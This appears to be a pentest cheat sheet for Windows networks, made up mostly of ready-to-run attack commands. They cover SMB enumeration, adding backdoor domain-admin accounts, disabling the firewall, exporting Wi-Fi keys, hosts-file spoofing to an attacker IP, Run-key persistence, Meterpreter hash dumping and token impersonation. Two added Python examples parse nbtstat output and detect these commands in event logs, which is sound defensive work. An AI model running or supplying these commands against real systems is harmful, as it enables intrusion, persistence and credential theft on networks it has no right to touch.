forked from 3mrgnc3/pentest_old
windows.txt
Windows
# Anonymous users can obtain the Windows password policy
msf > use auxiliary/scanner/smb/smb_enumusers
------------------------------------------------------------------------------------------------------
# CIFS NULL Session Permitted
enum4linux -a <target IP>
rpcclient -U "" <target IP>
Enter 's password: <return>
rpcclient $>
srvinfo
enumdomusers
queryuser <user>
netshareenum
netshareenumall
querydominfo
getdompwinfo
net use \\<target IP>\ipc$ "" /u:"" # Windows
------------------------------------------------------------------------------------------------------
# CIFS Share Writeable By Everyone
Places > Network > Browse Network
------------------------------------------------------------------------------------------------------
# Connect anonymously
smbclient -N -L <target IP>
# Connect with credentials
smbclient -W domain -U user -L <target IP>
proxychains smbclient '//10.0.0.10/c$' -U 'domain.local/username%password'
------------------------------------------------------------------------------------------------------
# NetBIOS and SMB
nmap -Pn -n -T4 -p139,445 --script=smb-check-vulns --script-args=unsafe=1 <target range>
enum -G <target IP> # Windows
enum -P <target IP>
nbtenum -r <target IP> # Windows
nbtenum -q <target IP>
nbtscan -r <target range>
nbtscan -f hosts.txt
------------------------------------------------------------------------------------------------------
# Show domain users and group information
DumpSec
------------------------------------------------------------------------------------------------------
# Show members of domain groups
global.exe "domain admins" \\dc-controller
------------------------------------------------------------------------------------------------------
# Search all folders for filenames that include 'password'.
dir /s /p *password*.* # Windows
------------------------------------------------------------------------------------------------------
# net commands
net accounts # Local password policies.
net accounts /domain
net config workstation
net localgroup # Local Security Groups.
net localgroup /domain # Domain Security Groups.
net localgroup Administrators # Users in the local Administrators Security Group.
net localgroup Administrators /domain # Users in the domain Administrators Security Group.
net share
net user # Local users.
net user /domain > users.txt # All users in the current user's domain (takes a while to run).
net user hacker /domain # Info on a domain user.
net view # Computers in the user's domain and other domains.
net view /domain # Computers in another domain.
net user hacker password /add
net localgroup administrators /add hacker
------------------------------------------------------------------------------------------------------
# Domain accounts
net group "Domain Admins" /domain > domain-admin.txt
net group "Domain Users" /domain > domain-users.txt
net user hacker password /add /domain
net group "Enterprise Admins" hacker /add /domain
net group "Enterprise Admins" /domain
------------------------------------------------------------------------------------------------------
# Domain control
nbtstat -a <target IP>
The NetBIOS suffix <1C> next to the domain name signifies that the system being polled is a domain
controller for the domain listed on the left. Had the <1C> appeared next to the INet~Services name
instead, it would have signified an IIS server.
Note the difference between U and G: U = UNIQUE and G = GROUP. A hex code next to UNIQUE is
usually associated with the computer itself; next to GROUP it is associated with the workgroup or
domain. Full suffix list: https://support.microsoft.com/en-us/kb/163409
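Reading the name table by hand is error-prone, so here is an added Python example (not part of the original cheat sheet) that parses nbtstat -a / -A output, labels each entry with the meaning from KB163409, and applies the rule above: a <1C> GROUP entry marks a domain controller for that domain, unless the name is INet~Services (IIS), and <00> UNIQUE is the machine's own computer name. The sample table below is constructed in nbtstat's layout, not a capture from a real host.

```python
import re

# Meaning of the common NetBIOS name-table entries, keyed by (suffix, type),
# taken from Microsoft KB163409 (the article linked in the text above).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "Domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service",
    ("20", "UNIQUE"): "File Server Service",
    ("1B", "UNIQUE"): "Domain Master Browser (PDC)",
    ("1C", "GROUP"): "Domain Controllers (IIS when the name is INet~Services)",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
}

# One row of the table:  NAME  <XX>  UNIQUE|GROUP  Registered
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)


def parse_name_table(text):
    """Turn nbtstat -a / -A output into a list of entry dicts."""
    entries = []
    for name, suffix, ntype, status in ROW_RE.findall(text):
        suffix = suffix.upper()
        entries.append({
            "name": name,
            "suffix": suffix,
            "type": ntype,
            "status": status,
            "meaning": SUFFIX_MEANING.get((suffix, ntype), "unknown"),
        })
    return entries


def domain_controllers(entries):
    """Domains for which the polled host registered the <1C> GROUP name, i.e.
    the host announces itself as a domain controller. INet~Services <1C> is
    IIS, not a DC, so it is excluded."""
    return sorted({
        e["name"] for e in entries
        if e["suffix"] == "1C" and e["type"] == "GROUP"
        and e["name"].upper() != "INET~SERVICES"
    })


def computer_names(entries):
    """<00> UNIQUE names belong to the machine itself, not to a group."""
    return sorted({e["name"] for e in entries
                   if e["suffix"] == "00" and e["type"] == "UNIQUE"})


# Constructed sample output in nbtstat's layout; not a capture from a real host.
SAMPLE = """
       NetBIOS Remote Machine Name Table

           Name               Type         Status
        ---------------------------------------------
        DC01           <00>  UNIQUE      Registered
        CORP           <00>  GROUP       Registered
        CORP           <1C>  GROUP       Registered
        DC01           <20>  UNIQUE      Registered
        CORP           <1B>  UNIQUE      Registered
        INet~Services  <1C>  GROUP       Registered

        MAC Address = 00-00-00-00-00-00
"""

if __name__ == "__main__":
    table = parse_name_table(SAMPLE)
    for e in table:
        print(f'{e["name"]:<15} <{e["suffix"]}> {e["type"]:<7} {e["meaning"]}')
    print("computer name(s):", computer_names(table))
    print("domain controller for:", domain_controllers(table))
```

Run it against real nbtstat output by replacing SAMPLE with the captured text; entries with suffixes not in the table are kept and marked "unknown" rather than dropped, so nothing in the capture is silently lost.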
------------------------------------------------------------------------------------------------------
# Enumeration
arp -a
ipconfig /all
ipconfig /displaydns
netstat -ano
netstat -ano | findstr LISTENING
netstat -c
netstat -ns
netstat -vb
route print
date /t & time /t
doskey /history
gpresult /COMPUTERNAME
gpresult /%username%
gpresult /z
nbtstat -A <target IP>
nbtstat -a <name of target>
net group
net group administrators
net session
net start
set
tasklist /m
tasklist /svc
tasklist /v
dir c:\*.xls /s # Show all Excel docs.
dir c:\*.xlsx /s # Show all Excel docs.
dir c:\*.ppt /s # Show all PowerPoint docs.
dir c:\*.pptx /s # Show all PowerPoint docs.
dir c:\*.doc /s # Show all Word docs.
dir c:\*.docx /s # Show all Word docs.
dir c:\*.pdf /s # Show all PDFs.
------------------------------------------------------------------------------------------------------
# Firewall (netsh firewall is the legacy context; newer systems use netsh advfirewall)
netsh firewall show config
netsh firewall show state
netsh firewall add portopening TCP 8081 ePO
netsh firewall set opmode disable # Disable firewall.
# Wireless
netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show networks
netsh wlan show profiles
netsh wlan show profiles name="name"
netsh wlan show profiles name="name" key=clear # Show the stored key in plaintext.
------------------------------------------------------------------------------------------------------
# Local DNS spoofing
echo <attacker IP> facebook >> %WINDIR%\System32\drivers\etc\hosts
type %WINDIR%\System32\drivers\etc\hosts
------------------------------------------------------------------------------------------------------
# Misc
cd \WINDOWS\system32\
type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
fsutil fsinfo drives
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f # Enable RDP.
rdesktop <target IP> # Linux RDP client.
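The net, netsh and reg commands in the sections above are also exactly what a defender sees in process-creation telemetry (Windows Security event 4688 with command-line auditing enabled, or Sysmon event ID 1). The following Python is an added example, not part of the original cheat sheet: it tokenizes a command line the way net.exe sees it (quoted group names stay one argument, and the image path may be the full path to net1.exe), then tags account creation, additions to the local Administrators group or to Domain/Enterprise Admins, the firewall opmode disable, the fDenyTSConnections=0 registry change and the key=clear Wi-Fi profile export. The sample events, host names, user names and tag names are constructed for the example.

```python
import re
from pathlib import PureWindowsPath

# Well-known privileged domain groups named in the cheat sheet above.
PRIVILEGED_DOMAIN_GROUPS = {"domain admins", "enterprise admins"}

# Whitespace-separated tokens, with double-quoted spans kept together.
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line the way net.exe / netsh.exe see their arguments."""
    return [quoted if quoted else bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def classify_command(cmdline):
    """Return the list of finding tags for one process command line ([] when nothing matched)."""
    toks = tokenize(cmdline)
    if not toks:
        return []
    exe = PureWindowsPath(toks[0]).name.lower()   # net, net1.exe, netsh, reg.exe ...
    args = [t.lower() for t in toks[1:]]
    findings = []

    if exe in ("net", "net.exe", "net1", "net1.exe") and len(args) >= 2:
        sub, target = args[0], args[1]
        on_domain = "/domain" in args
        is_priv_group = sub in ("group", "groups") and target in PRIVILEGED_DOMAIN_GROUPS
        if "/add" in args:
            if sub == "user":
                findings.append("domain_account_created" if on_domain else "local_account_created")
            elif sub == "localgroup" and target == "administrators":
                findings.append("local_admin_group_member_added")
            elif is_priv_group:
                findings.append("privileged_domain_group_member_added")
        elif is_priv_group:
            findings.append("privileged_group_enumeration")

    elif exe in ("netsh", "netsh.exe"):
        if args[:4] == ["firewall", "set", "opmode", "disable"]:
            findings.append("firewall_disabled")
        if args[:3] == ["wlan", "show", "profiles"] and "key=clear" in args:
            findings.append("wifi_key_export")

    elif exe in ("reg", "reg.exe") and args[:1] == ["add"]:
        # reg add ...\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
        if "fdenytsconnections" in args and "/d" in args:
            i = args.index("/d") + 1
            if i < len(args) and args[i] == "0":
                findings.append("rdp_enabled_via_registry")

    return findings


def scan_events(events):
    """events: iterable of (host, user, cmdline). Returns the flagged ones with their tags."""
    hits = []
    for host, user, cmdline in events:
        tags = classify_command(cmdline)
        if tags:
            hits.append({"host": host, "user": user, "cmdline": cmdline, "tags": tags})
    return hits


# Constructed sample events (host, user, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", "CORP\\alice", "ipconfig /all"),
    ("WS01", "CORP\\alice", "net user /domain"),
    ("WS01", "CORP\\alice", "net user hacker password /add"),
    ("WS01", "CORP\\alice", "net localgroup administrators /add hacker"),
    ("WS02", "CORP\\bob", r'C:\Windows\System32\net1.exe group "Domain Admins" hacker /add /domain'),
    ("WS02", "CORP\\bob", "netsh firewall set opmode disable"),
    ("WS02", "CORP\\bob", r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS02", "CORP\\bob", 'netsh wlan show profiles name="Office" key=clear'),
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f'{hit["host"]} {hit["user"]}: {", ".join(hit["tags"])}  <- {hit["cmdline"]}')
```

Plain enumeration such as net user /domain or net localgroup Administrators is deliberately not tagged: those commands are common in normal administration, and alerting on them produces noise, whereas the /add forms and the firewall and RDP changes are rare enough on workstations to be worth a ticket.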
------------------------------------------------------------------------------------------------------
# Run key persistence (regedit)
HKLM
File > Load Hive
Just give it a name.
Software\Microsoft\Windows\CurrentVersion\Run
Add your back doored file.
------------------------------------------------------------------------------------------------------
# Show domain admins
net group "Domain Admins" /domain
# Dump the local hashes
msf > run post/windows/gather/smart_hashdump
# Show the admins
msf > use auxiliary/scanner/smb/smb_enumusers_domain
# Compromise an admin's box, then assume their token
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token domain\\administrator
meterpreter > getuid
# Drop to a Windows shell
meterpreter > shell
C:\> whoami
# Add user to the domain
C:\> net user hacker /add /domain
# Add user to security group
C:\> net group "Domain Admins" hacker /add /domain